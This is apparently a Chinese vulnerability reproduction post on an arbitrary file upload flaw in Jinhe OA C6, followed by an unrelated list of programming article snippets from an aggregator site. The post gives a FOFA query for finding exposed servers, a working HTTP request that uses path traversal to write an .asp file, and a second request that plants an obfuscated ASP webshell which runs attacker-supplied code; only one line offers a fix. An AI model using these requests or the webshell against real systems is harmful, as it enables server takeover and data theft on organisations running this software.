3tefanie丶zhou
3tefanie丶zhou

金和OA c6 uploadfileeditorsave接口存在任意文件上传漏洞

产品简介

金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统升开发平台,电子政务一体化平台智慧电商平合等服务

漏洞概述

金和-c6 uploadfileeditorsave 任意文件上传,攻击者可通过此漏洞获取服务器权限

指纹识别

fofa:

app="金和网络-金和OA"

漏洞利用

poc:

POST /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\qps4cckjuz.asp HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 191
Content-Type: multipart/form-data; boundary=----9fh1lo9qobtszaiahg6v
Accept-Encoding: gzip, deflate

------9fh1lo9qobtszaiahg6v
Content-Disposition: form-data; name="file"; filename="qps4cckjuz.jpg"
Content-Type: image/png

<% response.write(111*111)
%>

------9fh1lo9qobtszaiahg6v--

金和OA c6 uploadfileeditorsave接口存在任意文件上传漏洞_第1张图片
验证url

http://your_ip/C6/filename参数中的文件名

金和OA c6 uploadfileeditorsave接口存在任意文件上传漏洞_第2张图片
上传webshell

POST /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\b.asp HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Connection: close
Content-Length: 1282
Content-Type: multipart/form-data; boundary=----9fh1lo9qobtszaiahg6v
Accept-Encoding: gzip, deflate

------9fh1lo9qobtszaiahg6v
Content-Disposition: form-data; name="file"; filename="b.jpg"
Content-Type: image/png

<%
Set AWf2I = Server.CreateObject("Scripting.Dictionary")

Function BPMMI0(content,isBin)
    dim size,i,result,keySize
    keySize = len(key)
    Set C2xl = CreateObject("ADODB.Stream")
    C2xl.CharSet = "iso-8859-1"
    C2xl.Type = 2
    C2xl.Open
    if IsArray(content) then
        size=UBound(content)+1
        For i=1 To size
            C2xl.WriteText chrw(ascb(midb(content,i,1)))
        Next
    end if
    C2xl.Position = 0
    if isBin then
        C2xl.Type = 1
        BPMMI0=C2xl.Read()
    else
        BPMMI0=C2xl.ReadText()
    end if

End Function
    content = request.BinaryRead(request.TotalBytes)
    if len(request.Cookies.Item("hhh"))>0  then
        if  IsEmpty(Session("payload")) then
            content=BPMMI0(content,false)
            Session("payload")=content
            response.End
        else
            AWf2I.Add "payload",Session("payload")
            Execute(AWf2I("payload"))
            result=run(content)
            if not IsEmpty(result) then
                response.BinaryWrite result
            end if
        end if
    end if
%>


------9fh1lo9qobtszaiahg6v--

金和OA c6 uploadfileeditorsave接口存在任意文件上传漏洞_第3张图片
测试连接
金和OA c6 uploadfileeditorsave接口存在任意文件上传漏洞_第4张图片
金和OA c6 uploadfileeditorsave接口存在任意文件上传漏洞_第5张图片

修复建议

联系软件厂商更新至最新安全版本

【千山以外有千山,这就是江山;六宫粉黛独见你,这就是美人。】

你可能感兴趣的:(漏洞复现,安全,网络)

  • gem5-gpu教程 DSENT (Design Space Exploration of Networks Tool) 配合gem5 事橙1999 gem5-gpu硬件架构
    概述DSENT是一种建模工具,旨在快速探索电子和新兴的片上光电网络(NoC)的设计空间。它为各种网络组件提供分析和参数化模型,并可在一系列技术假设下移植。给定架构级参数,DSENT从电气和光学构建块分层构建指定的模型,并输出详细的功率和面积估计。版本当前:0.91(2012年6月26日)最新版本或其他信息可在以下网址找到https://sites.google.com/site/mitdsent系
  • react快速开始项目模板 飞鸟malred 前端react.js前端前端框架
    代码仓库gitee创建项目首先保证安装了node,然后使用vite创建项目vitenpmcreatevitereact-learncdreact-learnnpmi目录结构一个完整的前端项目需要:状态管理在全局维护共有的状态(数据),让页面组件之间共享数据,我们使用pinia路由路由让页面之间可以进行跳转,我们使用vue-router样式样式让页面更美观,我们使用tailwindcss网络请求前端
  • Solidity学习 - 断言失败 本郡主是喵 #Solidity学习区块链Solidity
    文章目录前言一、原理剖析(一)断言的作用(二)断言失败的影响(三)与require的区别二、案例分析(一)某去中心化金融(DeFi)借贷合约案例(二)某加密货币交易平台智能合约案例三、解决办法(一)正确区分assert和require的使用场景前言在Solidity智能合约开发领域,确保代码的稳健性和安全性是至关重要的。其中,断言失败漏洞是一个需要开发者高度警惕的问题,它可能会对智能合约的正常运行
  • 网络安全相关专业就业,零基础入门到精通,看这一篇分析就够了
    对于就业环境来说,都说不好,但我分析下来,其实网络安全专业还是有很多选择或出路的。有不少部门,可能很多人没有之前都没有听说过,平时也没有关注这块的招聘或者考编信息。今天,统一整理一下,方便大家获取。1、政府部门与事业单位在政府部门与事业单位中,网络安全专业毕业生有多个选择:公安局、网信办等部门:虽然工作压力较大,但待遇优厚且有编制保障。省直、市直单位信息中心:性价比高且有编制保障,是一个稳定且不错
  • 《网络攻防技术》《数据分析与挖掘》《网络体系结构与安全防护》这三个研究领域就业如何? 扣棣编程 其他网络数据分析安全
    这几个研究领域都是当前信息技术领域的热点方向,就业前景总体来说都非常不错,但各有侧重和特点。我来帮你详细分析一下:1.网络攻防技术就业前景:非常火热且持续增长。核心方向:渗透测试、漏洞挖掘与分析、恶意软件分析、入侵检测/防御、应急响应、威胁情报、安全审计、红蓝对抗等。市场需求:极高。数字化转型深入、网络攻击日益频繁和复杂(勒索软件、APT攻击、供应链攻击等)、数据安全与隐私保护法规(如GDPR、中
  • SqlServer基础学习笔记 @半夏微凉科技 技术拓展#sqlserversqlserver数据库学习笔记sqlServer学习笔记
    SqlServer基础学习笔记介绍了SQLServer数据库管理系统的基础知识,包括数据库的创建、表的设计、SQL查询语句、数据类型、索引、以及常见的管理任务等内容,适合初学者入门学习。第一章:SQLServer简介1.1SQLServer概述SQLServer是由Microsoft公司开发的关系型数据库管理系统,用于存储和管理大量数据。它提供了可靠性、安全性和高性能的数据库解决方案,广泛应用于企
  • MyBB免费论坛 v1.8.21:开源论坛搭建与管理 车英赫
    本文还有配套的精品资源,点击获取简介:MyBB免费论坛v1.8.21是一个流行的开源论坛软件,以其灵活性、易用性和功能丰富性著称。它由PHP语言编写,利用MySQL数据库存储数据,并提供了一个符合用户习惯的高效平台。MyBB具备标准的论坛布局和强大的功能特性,包括权限管理、插件系统、主题与模板定制、积分奖励系统、强大的搜索功能、邮件通知、报告系统和多语言支持。同时,MyBB注重安全性,修复了安全漏
  • CIANNA由天体物理学家提供/为天体物理学家提供的卷积交互式人工神经网络 struggle2025 神经网络
    一、软件介绍文末提供程序和源码下载CIANNA是一个通用的深度学习框架,主要用于天文数据分析。根据天体物理问题解决的相关性添加功能和优化。CIANNA可用于为各种任务构建和训练大型神经网络模型,并提供高级Python接口(类似于keras、pytorch等)。CIANNA的特点之一是它定制实施了受YOLO启发的对象探测器,用于2D或3D射电天文数据产品中的星系探测。该框架通过低级CUDA编程完全实
  • 层归一化Layer Normalization Summer_Anny python人工智能
    层归一化层归一化(LayerNormalization)是一种神经网络中常用的归一化技朧,用于在训练过程中加速收敛、稳定训练,并提高模型的泛化能力。与批归一化(BatchNormalization)类似,层归一化是一种归一化技朧,但是它是对每个样本的特征进行归一化,而不是对整个批次的特征进行归一化。层归一化的计算公式如下:[LayerNorm(x)=γx−μσ2+ϵ+β][\text{LayerN
  • ARMv8-A架构参考手册:全面解析ARM架构的未来 韦原策Noblewoman
    ARMv8-A架构参考手册:全面解析ARM架构的未来【下载地址】ARMv8-A架构参考手册探索ARMv8-A架构的终极指南,本手册深入解析了AArch64与AArch32两种执行状态,涵盖了A32、T32及A64指令集,以及异常模型、内存管理、程序员模型等核心内容。无论您是开发者还是研究人员,都能从中获取到关于ARMv8-A架构的全面知识,助您在处理器操作、系统寄存器和安全模型等领域游刃有余。通过
  • 真实案例出发,再谈retrofit封装 何小Ai同学 android-基础androidretrofit
    原文链接:Anthony的简书博客项目代码:CameloeAnthony/Ant前言在使用了一段时间的Retrofit之后,今天终于在这里讲解到了网络的部分。目前开源的HTTP框架有很多,Volley,AndroidAsyncHttp,以及OkHttp+Retrofit等。而我在自己的使用中选择了Retrofit,这里就从基础到原理,再到实例的方式,讲解我对Retrofit做出的一些封装和使用。来
  • Ubuntu 主机通过 `enp4s0` 向开发板共享网络的完整步骤 is0815 网络ubuntu
    ✅步骤总览:Ubuntu主机通过enp4s0向开发板共享wlp5s0网络1️⃣为enp4s0设置静态IPsudoipaddrflushdevenp4s0#清除旧配置(可选)sudoipaddradd192.168.100.1/24devenp4s0sudoiplinksetenp4s0up2️⃣安装并配置dnsmasq(提供DHCP给开发板)sudoaptinstalldnsmasq编辑配置文件:
  • 简说 MISRA-C++ is0815 c++
    MISRA-C++是嵌入式系统中广泛采用的C++编码规范,旨在提高代码安全性、可靠性和可维护性。以下是MISRA-C++的详细要求,涵盖核心规则分类、禁用特性及最佳实践:一、核心规则分类1.语言使用限制禁用动态内存分配(new/delete、std::malloc)风险:内存碎片、分配失败导致运行时崩溃替代:静态数组、对象池或定制内存分配器禁用异常处理(try/catch/throw)风险:异常展
  • 分布式系统ID生成方案深度解析:雪花算法 vs UUID vs 其他主流方案 可曾去过倒悬山 算法后端
    分布式系统ID生成方案深度解析:雪花算法vsUUIDvs其他主流方案在分布式系统中,如何高效生成全局唯一ID是一个关键挑战。本文将深入剖析雪花算法、UUID及多种主流ID生成方案,帮助开发者根据业务场景选择最佳方案。一、为什么需要分布式ID?在分布式系统中,传统数据库自增ID存在明显瓶颈:单点故障:依赖单数据库实例扩展困难:分库分表时ID冲突安全风险:连续ID暴露业务量性能瓶颈:高并发下成为系统瓶
  • HTTP代理时减少TCP重传的技巧 华科℡云 运维服务器linux
    在HTTP代理场景中,TCP重传会增加网络延迟、降低传输效率,影响用户体验。以下是一些减少TCP重传的有效技巧。优化网络环境确保网络稳定:检查代理服务器与客户端、目标服务器之间的网络连接,排查是否存在线路故障、信号干扰等问题。例如,若使用无线网络,可尝试更换为有线连接,以减少信号波动导致的丢包。合理分配带宽:避免代理服务器所在网络带宽被过度占用。可通过网络管理工具对不同业务的带宽进行限制和分配,确
  • Python HTTP日志分析:Nginx/Apache日志的Python解析 华科℡云 网络协议负载均衡运维
    Web服务器日志是监控流量模式、性能瓶颈及安全威胁的关键数据源。Python凭借其丰富的库生态,可高效解析Nginx与Apache的日志格式,实现结构化数据提取与分析。日志格式解析基础Nginx默认采用combined格式,字段包括:$remote_addr(客户端IP)、$time_local(时间戳)、$request(请求方法+URL+协议)、$status(HTTP状态码)、$body_b
  • Android 跨进程通信(IPC)深度技术总结 JT-Blink Androidandroid
    1.概述Android系统基于Linux内核,采用多进程架构设计。每个Android应用默认运行在独立的进程中,拥有独立的虚拟机实例和内存空间。进程间的内存隔离机制保证了系统的稳定性和安全性,但同时也带来了进程间通信的挑战。1.1为什么需要跨进程通信系统架构需求:Android系统服务(如ActivityManagerService、WindowManagerService)运行在system_s
  • 【docker】离线部署docker-compose
    简介记录一下安装docker-compose的步骤,首先表示安装的系统是centos,docker已经安装好了,本文采用的是离线安装的方式。网上使用的在线安装由于github网络时好时坏,所以只能采用离线安装的方式。参考文档。步骤1.进入到官网官网的链接是https://github.com/docker/compose/releases/tag/v2.18.1。注意这里的是2.18.1版本,可以
  • nvidia-container-runtime离线包安装说明:快速部署NVIDIA容器环境 盛罡城Rachel
    nvidia-container-runtime离线包安装说明:快速部署NVIDIA容器环境【下载地址】nvidia-container-runtime离线包安装说明此项目为无网络环境下的用户提供了nvidia-container-runtime的离线安装包,极大简化了安装流程。通过简单的解压缩和rpm包安装,用户可以快速完成环境配置。安装完成后,仅需重启Docker容器即可生效。项目特别适合网络
  • websocket多客户端接收消息_WebSocket之消息接收发送 weixin_39940344
    WebSocket协议是基于TCP的一种新的网络协议。它实现了浏览器与服务器全双工(full-duplex)通信——允许服务器主动发送信息给客户端。在WebSocketAPI中,浏览器和服务器只需要完成一次握手,两者之间就直接可以创建持久性的连接,并进行双向数据传输。http协议是单向通信,一般由客户端发起请求,然后接收服务端响应。如果要实现客户端实时消息跟新功能如:更新聊天消息,更新邮件信息,更
  • java deque linkedlist_java 中 linkedList使用 weixin_39956558 javadequelinkedlist
    java中linkedList使用1介绍2特点下面是LinkedList最重要特性:操作list元素从开始或结束反序不是线程安全每个元素是个node节点,节点保持之前和之后引用保持插入有序虽然LinkedLIst不是线程安全,我们创建线程安全版本LinkedList,调用Listlist=Collections.synchronizedList(newLinkedList(...));3比较Arr
  • Vector,ArrayList,LinkedList 的区别是什么? disciplineOneself 基础知识链表java数据结构
    前言:这个问题主要是考察集合框架的问题,主要考察三者之间设计的区别,以及使用时如何抉择。Vector线程同步(安全),ArrayList、LinkedList线程不同步(不安全)Vector是java早期提供的线程安全的动态数组;Arraylist也是动态数组,但不是线程安全的;而LinkedList与前者不同,LinkedList是使用双向链表存储的,也不是线程安全的。Vector是因为是线程安
  • 储能业 | 低成本部署!DolphinDB 打造抽水蓄能一体化解决方案 DolphinDB智臾科技 物联网数据库大数据DolphinDB实时计算抽水蓄能电力
    导语在电力行业抽水蓄电场景中,电力集团可以基于DolphinDB搭建轻量化实时数仓,有效破解高频数据写入、万亿级数据存储和秒级实时计算等核心难题。同时,该方案助力集团降本增效,提升运维效率,并实现对多个电站数据的统一管理与调度,加快数字化转型步伐。一、行业背景构建清洁低碳、安全高效的新型能源电力系统是实现“双碳”目标的一大关键任务。其中,抽水蓄能作为当前最成熟、最具规模化应用前景的物理储能技术,正
  • C#使用ExcelDataReader高效读取excel文件写入数据库 香煎三文鱼 .netcore.Net6C#C#读取excel
    分享一个库ExcelDataReader,它专注读取、支持.xls/.xlsx、内存优化。首先安装NuGet包dotnetaddpackageExcelDataReaderdotnetaddpackageSystem.Text.Encoding.CodePages编码内存优化:每次仅读取一行,适合处理百万级数据。类型安全方法:可用GetString(0)、GetDouble(1)等强类型方法(需确
  • C#哈希加密:原理、实现与应用 阿蒙Armon C#工作中的应用c#哈希算法开发语言
    C#哈希加密:原理、实现与应用在当今数字化时代,数据安全是每个应用程序都必须重视的问题。哈希加密作为一种重要的加密技术,在密码存储、数据完整性验证、数字签名等领域发挥着关键作用。本文将深入探讨C#中哈希加密的原理、常用算法以及实际应用,并通过代码示例展示如何在C#中实现哈希加密。一、哈希加密基础哈希加密(也称为哈希函数或散列函数)是一种将任意长度的输入数据转换为固定长度输出的算法。这个固定长度的输
  • 工业控制系统安全综述 罗思付之技术屋 物联网及AI前沿技术专栏安全网络web安全
    摘要工业控制系统除了应用于生产制造行业外,还广泛应用于交通、水利和电力等关键基础设施.随着工业数字化、网络化、智能化的推进,许多新技术应用于工业控制系统,提高了工业控制系统的智能化水平,但其也给工业控制系统的安全带来严峻的挑战.因此,工业控制系统的安全倍受研究人员的关注.为了让研究人员系统化地了解目前的研究进展,调研了近3年WebofScience核心数据库、EI数据库和CCF推荐网络与信息安全国
  • 提升异地网络性能的全面指南:QoS策略、CDN加速与WAN优化技术 北极光SD-WAN组网 网络
    一、网络延迟与带宽优化:QoS策略与带宽聚合技术1.1QoS(服务质量)策略的核心功能QoS(QualityofService)是网络性能优化的核心技术,通过对网络流量进行分类和优先级分配,确保关键业务(如视频会议、语音通话)的低延迟和高可靠性。关键策略包括:流量分类与优先级分配:通过策略规则对不同种类的流量进行标记,将高优先级分配给实时性要求高的业务。拥塞管理:利用队列技术如CBWFQ(基于类的
  • 科伦坡证券交易所(CSE)定制的全栈系统开发报告 Ashlee_guweng22346 pythonjavaperldocker数据结构emacs算法
    “全自动化交易平台”(CSE主席瓦吉拉·库拉提拉卡评价)的进化——订单处理延迟1Tbps)。容器化微服务:iSulad轻量容器引擎(内存开销6MB)实现Kubernetes秒级扩容,资源利用率提升70%,故障切换时间10ms,错失套利窗口。方案:鲲鹏低延迟引擎+InfiniBand网络。结果:时延降至0.5ms,套利收益年化提升22%。
  • XML 命名空间 沐知全栈开发 开发语言
    XML命名空间引言XML(可扩展标记语言)作为一种数据存储和交换的格式,因其灵活性、可扩展性和易于解析而被广泛应用于网络数据的传输和存储。在XML中,命名空间的概念用于解决元素名称的冲突问题,确保不同来源的XML文档能够和谐共存。本文将详细探讨XML命名空间的概念、作用及其应用。什么是XML命名空间?XML命名空间是XML文档中的一个特殊属性,用于区分不同来源的元素和属性。简单来说,它是一种标识符
  • 鸿蒙线程池全揭秘:让你的应用快、稳、省资源 harmonyos
    摘要在现代应用开发中,多线程已经成为提升程序性能、优化用户体验的关键手段。尤其是在HarmonyOS(鸿蒙系统)这种强调分布式、并发处理的系统架构中,合理使用多线程不仅可以让程序运行更高效,还能帮助我们处理复杂的后台任务,比如文件下载、数据库操作、网络请求等。引言鸿蒙系统作为面向多设备融合的新一代操作系统,其支持的多线程模型与传统Android十分类似。很多Java的线程操作方法在鸿蒙中依然适用。
  • log4j对象改变日志级别 3213213333332132 javalog4jlevellog4j对象名称日志级别
    log4j对象改变日志级别可批量的改变所有级别,或是根据条件改变日志级别。 log4j配置文件: log4j.rootLogger=ERROR,FILE,CONSOLE,EXECPTION #log4j.appender.FILE=org.apache.log4j.RollingFileAppender log4j.appender.FILE=org.apache.l
  • elk+redis 搭建nginx日志分析平台 ronin47 elasticsearchkibanalogstash
                 elk+redis 搭建nginx日志分析平台 logstash,elasticsearch,kibana 怎么进行nginx的日志分析呢?首先,架构方面,nginx是有日志文件的,它的每个请求的状态等都有日志文件进行记录。其次,需要有个队 列,redis的l
  • Yii2设置时区 dcj3sjt126com PHPtimezoneyii2
    时区这东西,在开发的时候,你说重要吧,也还好,毕竟没它也能正常运行,你说不重要吧,那就纠结了。特别是linux系统,都TMD差上几小时,你能不痛苦吗?win还好一点。有一些常规方法,是大家目前都在采用的1、php.ini中的设置,这个就不谈了,2、程序中公用文件里设置,date_default_timezone_set一下时区3、或者。。。自己写时间处理函数,在遇到时间的时候,用这个函数处理(比较
  • js实现前台动态添加文本框,后台获取文本框内容 171815164 文本框
    <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
  • 持续集成工具 g21121 持续集成
            持续集成是什么?我们为什么需要持续集成?持续集成带来的好处是什么?什么样的项目需要持续集成?...        持续集成(Continuous integration ,简称CI),所谓集成可以理解为将互相依赖的工程或模块合并成一个能单独运行
  • 数据结构哈希表(hash)总结 永夜-极光 数据结构
    1.什么是hash 来源于百度百科: Hash,一般翻译做“散列”,也有直接音译为“哈希”的,就是把任意长度的输入,通过散列算法,变换成固定长度的输出,该输出就是散列值。这种转换是一种压缩映射,也就是,散列值的空间通常远小于输入的空间,不同的输入可能会散列成相同的输出,所以不可能从散列值来唯一的确定输入值。简单的说就是一种将任意长度的消息压缩到某一固定长度的消息摘要的函数。  
  • 乱七八糟 程序员是怎么炼成的
    eclipse中的jvm字节码查看插件地址: http://andrei.gmxhome.de/eclipse/ 安装该地址的outline 插件  后重启,打开window下的view下的bytecode视图 http://andrei.gmxhome.de/eclipse/   jvm博客: http://yunshen0909.iteye.com/blog/2
  • 职场人伤害了“上司” 怎样弥补 aijuans 职场
    由于工作中的失误,或者平时不注意自己的言行“伤害”、“得罪”了自己的上司,怎么办呢?   在职业生涯中这种问题尽量不要发生。下面提供了一些解决问题的建议:   一、利用一些轻松的场合表示对他的尊重   即使是开明的上司也很注重自己的权威,都希望得到下属的尊重,所以当你与上司冲突后,最好让不愉快成为过去,你不妨在一些轻松的场合,比如会餐、联谊活动等,向上司问个好,敬下酒,表示你对对方的尊重,
  • 深入浅出url编码 antonyup_2006 应用服务器浏览器servletweblogicIE
    出处:http://blog.csdn.net/yzhz  杨争   http://blog.csdn.net/yzhz/archive/2007/07/03/1676796.aspx 一、问题:         编码问题是JAVA初学者在web开发过程中经常会遇到问题,网上也有大量相关的
  • 建表后创建表的约束关系和增加表的字段 百合不是茶 标的约束关系增加表的字段
      下面所有的操作都是在表建立后操作的,主要目的就是熟悉sql的约束,约束语句的万能公式   1,增加字段(student表中增加 姓名字段)   alter table 增加字段的表名 add 增加的字段名 增加字段的数据类型 alter table student add name varchar2(10);   &nb
  • Uploadify 3.2 参数属性、事件、方法函数详解 bijian1013 JavaScriptuploadify
    一.属性 属性名称 默认值 说明 auto true 设置为true当选择文件后就直接上传了,为false需要点击上传按钮才上传。 buttonClass ” 按钮样式 buttonCursor ‘hand’ 鼠标指针悬停在按钮上的样子 buttonImage null 浏览按钮的图片的路
  • 精通Oracle10编程SQL(16)使用LOB对象 bijian1013 oracle数据库plsql
    /* *使用LOB对象 */ --LOB(Large Object)是专门用于处理大对象的一种数据类型,其所存放的数据长度可以达到4G字节 --CLOB/NCLOB用于存储大批量字符数据,BLOB用于存储大批量二进制数据,而BFILE则存储着指向OS文件的指针 /* *综合实例 */ --建立表空间 --#指定区尺寸为128k,如不指定,区尺寸默认为64k CR
  • 【Resin一】Resin服务器部署web应用 bit1129 resin
    工作中,在Resin服务器上部署web应用,通常有如下三种方式:   配置多个web-app 配置多个http id 为每个应用配置一个propeties、xml以及sh脚本文件 配置多个web-app   在resin.xml中,可以为一个host配置多个web-app   <cluster id="app&q
  • red5简介及基础知识 白糖_ 基础
      简介   Red5的主要功能和Macromedia公司的FMS类似,提供基于Flash的流媒体服务的一款基于Java的开源流媒体服务器。它由Java语言编写,使用RTMP作为流媒体传输协议,这与FMS完全兼容。它具有流化FLV、MP3文件,实时录制客户端流为FLV文件,共享对象,实时视频播放、Remoting等功能。用Red5替换FMS后,客户端不用更改可正
  • angular.fromJson boyitech AngularJSAngularJS 官方APIAngularJS API
    angular.fromJson 描述: 把Json字符串转为对象 使用方法: angular.fromJson(json); 参数详解: Param Type Details json string JSON 字符串 返回值: 对象, 数组, 字符串 或者是一个数字 示例: <!DOCTYPE HTML> <h
  • java-颠倒一个句子中的词的顺序。比如: I am a student颠倒后变成:student a am I bylijinnan java
    public class ReverseWords { /** * 题目:颠倒一个句子中的词的顺序。比如: I am a student颠倒后变成:student a am I.词以空格分隔。 * 要求: * 1.实现速度最快,移动最少 * 2.不能使用String的方法如split,indexOf等等。 * 解答:两次翻转。 */ publ
  • web实时通讯 Chen.H Web浏览器socket脚本
    关于web实时通讯,做一些监控软件。 由web服务器组件从消息服务器订阅实时数据,并建立消息服务器到所述web服务器之间的连接,web浏览器利用从所述web服务器下载到web页面的客户端代理与web服务器组件之间的socket连接,建立web浏览器与web服务器之间的持久连接;利用所述客户端代理与web浏览器页面之间的信息交互实现页面本地更新,建立一条从消息服务器到web浏览器页面之间的消息通路
  • [基因与生物]远古生物的基因可以嫁接到现代生物基因组中吗? comsci 生物
          大家仅仅把我说的事情当作一个IT行业的笑话来听吧..没有其它更多的意思     如果我们把大自然看成是一位伟大的程序员,专门为地球上的生态系统编制基因代码,并创造出各种不同的生物来,那么6500万年前的程序员开发的代码,是否兼容现代派的程序员的代码和架构呢?   
  • oracle 外部表 daizj oracle外部表external tables
        oracle外部表是只允许只读访问,不能进行DML操作,不能创建索引,可以对外部表进行的查询,连接,排序,创建视图和创建同义词操作。 you can select, join, or sort external table data. You can also create views and synonyms for external tables. Ho
  • aop相关的概念及配置 daysinsun AOP
    切面(Aspect): 通常在目标方法执行前后需要执行的方法(如事务、日志、权限),这些方法我们封装到一个类里面,这个类就叫切面。 连接点(joinpoint) spring里面的连接点指需要切入的方法,通常这个joinpoint可以作为一个参数传入到切面的方法里面(非常有用的一个东西)。 通知(Advice) 通知就是切面里面方法的具体实现,分为前置、后置、最终、异常环
  • 初一上学期难记忆单词背诵第二课 dcj3sjt126com englishword
    middle 中间的,中级的 well 喔,那么;好吧 phone 电话,电话机 policeman 警察 ask 问 take 拿到;带到 address 地址 glad 高兴的,乐意的 why 为什么  China 中国 family 家庭 grandmother (外)祖母 grandfather (外)祖父 wife 妻子 husband 丈夫 da
  • Linux日志分析常用命令 dcj3sjt126com linuxlog
    1.查看文件内容 cat -n 显示行号 2.分页显示 more Enter 显示下一行 空格 显示下一页 F 显示下一屏 B 显示上一屏 less /get 查询"get"字符串并高亮显示 3.显示文件尾 tail -f 不退出持续显示 -n 显示文件最后n行 4.显示头文件 head -n 显示文件开始n行 5.内容排序 sort -n 按照
  • JSONP 原理分析 fantasy2005 JavaScriptjsonpjsonp 跨域
    转自 http://www.nowamagic.net/librarys/veda/detail/224 JavaScript是一种在Web开发中经常使用的前端动态脚本技术。在JavaScript中,有一个很重要的安全性限制,被称为“Same-Origin Policy”(同源策略)。这一策略对于JavaScript代码能够访问的页面内容做了很重要的限制,即JavaScript只能访问与包含它的
  • 使用connect by进行级联查询 234390216 oracle查询父子Connect by级联
    使用connect by进行级联查询          connect by可以用于级联查询,常用于对具有树状结构的记录查询某一节点的所有子孙节点或所有祖辈节点。          来看一个示例,现假设我们拥有一个菜单表t_menu,其中只有三个字段:
  • 一个不错的能将HTML表格导出为excel,pdf等的jquery插件 jackyrong jquery插件
    发现一个老外写的不错的jquery插件,可以实现将HTML 表格导出为excel,pdf等格式, 地址在: https://github.com/kayalshri/ 下面看个例子,实现导出表格到excel,pdf <html> <head> <title>Export html table to excel an
  • UI设计中我们为什么需要设计动效 lampcy UIUI设计
    关于Unity3D中的Shader的知识 首先先解释下Unity3D的Shader,Unity里面的Shaders是使用一种叫ShaderLab的语言编写的,它同微软的FX文件或者NVIDIA的CgFX有些类似。传统意义上的vertex shader和pixel shader还是使用标准的Cg/HLSL 编程语言编写的。因此Unity文档里面的Shader,都是指用ShaderLab编写的代码,
  • 如何禁止页面缓存 nannan408 htmljspcache
    禁止页面使用缓存~ ------------------------------------------------ jsp:页面no cache: response.setHeader("Pragma","No-cache"); response.setHeader("Cache-Control","no-cach
  • 以代码的方式管理quartz定时任务的暂停、重启、删除、添加等 Everyday都不同 定时任务管理spring-quartz
          【前言】在项目的管理功能中,对定时任务的管理有时会很常见。因为我们不能指望只在配置文件中配置好定时任务就行了,因为如果要控制定时任务的 “暂停” 呢?暂停之后又要在某个时间点 “重启” 该定时任务呢?或者说直接 “删除” 该定时任务呢?要改变某定时任务的触发时间呢? “添加” 一个定时任务对于系统的使用者而言,是不太现实的,因为一个定时任务的处理逻辑他是不
  • EXT实例 tntxia ext
      (1) 增加一个按钮   JSP:   <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <% String path = request.getContextPath(); Stri
  • 数学学习在计算机研究领域的作用和重要性 xjnine Math
    最近一直有师弟师妹和朋友问我数学和研究的关系,研一要去学什么数学课。毕竟在清华,衡量一个研究生最重要的指标之一就是paper,而没有数学,是肯定上不了世界顶级的期刊和会议的,这在计算机学界尤其重要!你会发现,不论哪个领域有价值的东西,都一定离不开数学!在这样一个信息时代,当google已经让世界没有秘密的时候,一种卓越的数学思维,绝对可以成为你的核心竞争力.  无奈本人实在见地
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他